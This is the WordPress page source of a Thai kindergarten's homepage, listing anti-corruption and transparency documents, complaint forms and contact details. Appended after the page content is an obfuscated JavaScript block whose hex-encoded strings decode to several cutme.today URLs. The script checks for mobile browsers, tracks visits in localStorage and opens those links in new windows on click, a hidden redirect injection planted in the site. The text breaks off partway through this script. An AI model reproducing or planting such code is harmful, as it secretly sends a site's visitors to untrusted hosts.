data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return 